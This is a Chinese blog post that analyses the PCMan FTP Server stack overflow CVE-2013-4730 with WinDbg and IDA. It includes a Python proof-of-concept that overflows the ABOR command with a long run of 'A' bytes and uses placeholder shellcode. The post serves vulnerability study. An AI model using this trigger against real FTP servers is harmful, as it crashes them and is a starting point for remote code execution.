java栈溢出漏洞cve,PCMan FTP栈溢出漏洞(CVE-2013-4730)

最新推荐文章于 2023-12-08 10:57:52 发布
最新推荐文章于 2023-12-08 10:57:52 发布
阅读量189 收藏
点赞数
文章标签: java栈溢出漏洞cve

CVE-2013-4730是一个基于FTP软件的栈缓冲区溢出漏洞, 允许远程用户构造USER命令超长字符来实现任意代码执行

根据提供的POC代码使用idapro和windbg进行分析,首先查看poc.py代码

import socket as s

from sys import argv

#

if(len(argv) != 4):

print "USAGE: %s host [user] [password] % argv[0]"

exit(1)

else:

#store command line arguments

script,host,fuser,fpass=argv

#vars

junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars

espaddress = '\x41\x41\x41\x41' # 76BB0659

nops = '\x41' * 10

shellcode = '\x41' *150

sploit = junk+espaddress+nops+shellcode

#create socket

conn = s.socket(s.AF_INET,s.SOCK_STREAM)

#establish connection to server

conn.connect((host,21))

#post ftp user

conn.send('USER '+fuser+'\r\n')

#wait for response

uf = conn.recv(1024)

#post ftp password

conn.send('PASS '+fpass+'\r\n')

#wait for response

pf = conn.recv(1024)

#send ftp command with sploit

conn.send('ABOR '+sploit+'\r\n')

cf = conn.recv(1024)

#close connection

conn.close()

首先开启PCMan FTP,然后执行poc代码

poc.py 127.0.0.1 anonymous anonymous

触发了缓冲区溢出漏洞

2125d6565ed341835f22a79c4f90e762.png

使用windbg attach ftp程序,按g运行程序,然后命令行执行poc,可以看到windbg在地址0x41414141中断

16664e2b3f024de2e2fb128221a12702.png

Kb查看栈空间内容,已经变为全0x41

213d309a5f511533a62f9c865aeca942.png

Idapro载入ftp程序,imports中找到recv函数,找到两处调用

sub_4029B0+25  sub_4055E0+5E

1699a38a4dce7bf3673a42f1234340af.png

Windbg重新载入ftp程序,在这两处位置下断点

c98bd8de46b0b49cbc5d6d4b58ad424b.png

G运行,然后命令行执行poc,程序中断在第一个断点

428897b7b105fc8a9fcf62b506b4f23d.png

程序没有报错,继续g执行,程序崩溃,在第二次执行时断在0x4029d5

ade61eee52a3029d328137f39eb04ce5.png

重新载入ftp,设置断点在0x4029d5,执行到第二次时,查看esp内容

第二个参数0x12edc4表示缓冲区起始地址

e61800fdd9d9b5e0475c0695739bf10a.png

查看缓冲区内容,是输入的user/pass

d9bf6c74822526786227ddf0e7aaf606.png

按下p歩过call函数

0c34300ad1fedf34e23e1078f78cbc43.png

查看此时缓冲区内容变为ABOR AAA…AAA

4b37e5e2d7a9749367cfaadd42f87542.png

F10单步执行,程序崩溃的前一条指令地址在0x402a26

9e64c7f379e3a0240d71b6f8214a4e1f.png

也就是call sub_403E60这个函数会触发漏洞

94e412fcc5d4f4d297d7622ae8c8fa90.png

此函数中有个一sprintf()

4f7e83829f311f0389ac40a8e1a623ac.png

分析此函数,首先或GetLocalTime获取系统时间

cd7593d9baf2faa83b733c8e998328c0.png

以某个时间格式进行sprintf输出,以及其他内容,一共push了10个参数

e4225041522a5677a8b82ea5dcb12321.png

在0x4029d5处下断点,g运行并启动poc后,第二次断下时

在0x403EE6处下断点,g执行

deed44fa12e794da66bf5fecffb4fe78.png

F10歩过执行call命令后

67daa0fc4353d2a08a3d75fa2b9e1caf.png

查看此时栈内容,首先是%d格式的时间信息,然后是复制过来的ABOR AAA..AAA

80ac693d152406b19fa21bd34c3c0785.png

在返回地址0x403FB9处设置断点

6ced47c2cdfca5495ecee1b5c74dd25f.png

g执行到断点

ae335b377b9a60230732e818d98cee94.png

此时esp-4内容全部为0x41

77fe2f186d28655e37e66dcaf3fb3402.png

所以继续执行到地址0x41414141会出错

5359ba206d81be3a8a68d40e2511754d.png

weixin_39712455
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞分析之PCMan FTP Server缓冲区溢出漏洞分析与利用 (CVE-2013-4730)
Hades的博客
05-24 3778
PCMan FTP Server缓冲区溢出漏洞分析与利用(CVE-2013-4730)                                                                                                        作者:Hades0x0. 漏洞等级软件名称:PCMan FTP Server 软件版本:2.0.7 漏...
java存在溢出攻击吗_缓冲区溢出攻击
weixin_39974882的博客
02-26 628
缓冲区溢出漏洞(Buffer Overflow)是最早被发现也是最基础的软件安全漏洞技术类型之一。缓冲区溢出是一种非常普遍、非常危险的漏洞,在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,可以利用它执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。一、缓冲区溢出基本概念缓冲区溢出是计算机程序中存在的一类内存安全违规类漏...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -h Options: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads (default: 100) $ ./CVE-2013-6117 -f hostfile.txt 1.2.4.4|name.no-ip.org:80|username|password $ ./CVE-2013-6117 -t 1.2.3.4 1.2.4.4|name.no-ip.org:80|username|password 参考:
CVE-2013-4730漏洞分析
信息安全
08-09 581
1.软件简介 PCMan’s FTP Server是洪任谕程序员所研发的一套FTP服务器软件。该软件具有体积小、功能简单等特点。 2.漏洞成因 PCMan’s FTP Server 2.0.0版本中存在缓冲区溢出漏洞。远程攻击者可借助USER命令中的长字符串利用该漏洞执行任意代码。 3.利用过程 环境:Windows 7 我们需要有一份能与FTP进行交互的代码才能受控的处发此漏洞。理论上讲,只要 ...
PCManFTP v2.0(CVE-2013-4730漏洞分析报告
weixin_30344131的博客
12-17 135
PCManFTP v2.0(CVE-2013-4730漏洞分析报告 感谢李燕青的排版 软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2005-01-01 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:CVE-201...
PCManFTP v2.0(CVE-2013-4730)漏洞分析报告
w_g3366的博客
08-02 623
文章目录PCManFTP v2.0漏洞分析报告1.软件简介2.漏洞成因3.构造触发漏洞的POC4.构造Exploit5.漏洞利用 PCManFTP v2.0漏洞分析报告 软件名称 PCManFTP 操作系统 Windows XP 软件版本 2.0 漏洞编号 CVE-2013-4730 漏洞模块 PCManFTPD2.exe 危害等级 超危 模块版本 2.0.7 漏洞类型 缓...
Androidroot源码利用CVE-2013-6282漏洞.zip
07-30
Androidroot源码利用CVE-2013-6282漏洞.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
PCManFTP v2.0(CVE-2013-4730漏洞分析
datouyu0824的博客
03-21 705
1. 软件简介 PCMan's FTP Server是洪任谕程序员所研发的一套FTP服务器软件。该软件具有体积小、功能简单等特点。 2. 漏洞成因 PCMan's FTP Server 2.0.0版本中存在缓冲区溢出漏洞。 该软件由于未能有效处理FTP命令的长度字符(最大0x1000),进而在调用字符串拷贝函数时(和sprintf功能相同)未判断长度引发栈溢出漏洞,导致攻击者可以远程执行任何命令。 用于FTP登录的“USER”命令即可以触发此漏洞,也就是可以在未获取FTP的访问权限的前提下,就
java存在溢出攻击吗_Java有缓冲区溢出吗?
weixin_30629043的博客
02-26 990
由于Javastring基于字符数组,Java自动检查数组边界,所以缓冲区溢出只能在不常见的情况下使用:如果你通过JNI调用本地代码在JVM本身(通常用C ++编写)解释器或JIT编译器无法正常工作(Java字节码强制执行边界检查)像Java和C#这样的pipe理语言没有这些问题,但是实际运行代码的特定虚拟机(JVM / CLR / etc)可能会有这些问题。对于所有的意图和目的,没有。Java有...
Asterisk Open Source 栈缓冲区溢出漏洞(CVE-2013-2685)
m0_49025459的博客
05-14 254
Asterisk是一款开放源码的软件PBX,支持各种VoIP协议和设备。Asterisk包含的h264_format_attr_sdp_parse()函数(res/res_format_attr_h264.c)存在一个溢出条件。问题是由于在处理H.264视频的媒体属性时没有正确校验用户提交的输入,允许攻击者提交特制的SDP标头,远程攻击者可以利用漏洞触发基于栈的缓冲区溢出,可以应用程序上下文执行任意代码。
栈溢出漏洞CVE-2020-8423复现
qq_45595732的博客
08-03 2150
TP-Link WR841N 栈溢出漏洞CVE-2020-8423) 第一次搞iot相关,对mips的汇编还不是很熟,先熟悉一下搭环境,之后再去理解原理,这里记录一下环境搭建流程。虽然iot-vulhub已经都做好了docker,但在自己复现的时候还是多多少少会有些问题。 IoT-vulhub基础环境搭建 #安装pip $ curl -s https://bootstrap.pypa.io/get-pip.py | python3 #安装docker #命令行输docker,根据提示安装就行 # 启动
两个栈溢出CVE漏洞实验
qq_43840665的博客
04-19 5292
实验原理 缓冲区溢出概述 定义 缓冲区是指被程序内部使用或存放用户输入的内存区域,而溢出是指计算机向缓冲区填充数据时超出了缓冲区本身的容量,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。 由于堆栈是由内存高地址向内存低地址方向增长,而数组的变量是从内存低地址向高地址方向增长。如果没有对数据的越界进行检查和限制,通过向程序的数组缓冲区写入超出其长度的内容,覆盖堆栈原来的返回地址,就会造成缓冲区溢出,从而破坏程序的堆栈。如果构造特殊的注入向量覆盖返回地址,使程序转而执行恶意代码
Easy Chat Server栈缓冲区溢出漏洞CVE-2023-4494分析与复现
最新发布
C20220511的博客
12-08 260
漏洞源于使用HTTP GET对register.ghp文件进行访问时,未检查用户提交的username值的长度是否超过限制,从而使栈缓冲区溢出,覆盖其他内存空间,可导致任意代码执行。该函数的功能是释放堆内存空间,从代码中可以看出,试图读取一个不存在的地址41414145的数据,导致了异常。从上述的分析中可以看出,调用sprintf函数拼接username字段前,没有检查username的长度是否超出限制,并且username字段可控,导致栈溢出,可以覆盖SEH和函数返回地址,导致任意代码执行。
Java中的内存泄露、内存溢出与栈溢出
欧阳方超的专栏
05-01 1626
内存泄漏、内存溢出和栈溢出都是程序中常见的内存问题,它们都会导致程序运行的异常和不稳定。为了避免这些问题,我们需要在编程中注意及时释放不再使用的资源和对象引用,避免内存分配过多,优化算法和代码结构等。
CVE-2019-5786 漏洞原理分析及利用
晓得哥的博客
07-02 1527
CVE-2019-5786 漏洞原理分析及利用 作者:Kerne7@知道创宇404实验室 时间:2020年6月29日 从补丁发现漏洞本质 首先根据谷歌博客收集相关CVE-2019-5786漏洞的资料:High CVE-2019-5786: Use-after-free in FileReader,得知是FileReader上的UAF漏洞。 然后查看https://github.com/chromium/chromium/commit/ba9748e78ec7e9c0d594e7edf7b2c07ea2a90
CVE-2013-2768 漏洞利用
07-28
很抱歉,但是根据提供的引用内容,我没有找到关于CVE-2013-2768漏洞的相关信息。请确认是否有其他引用内容提供了相关信息。如果有,请提供相关引用内容,我将尽力回答您的问题。 #### 引用[.reference_title] - *1* *2* [CVE-2013-4547 Nginx文件名解析漏洞详解](https://blog.csdn.net/weixin_40228200/article/details/127132011)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2013-4547漏洞复现](https://blog.csdn.net/HEAVEN569/article/details/113805042)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值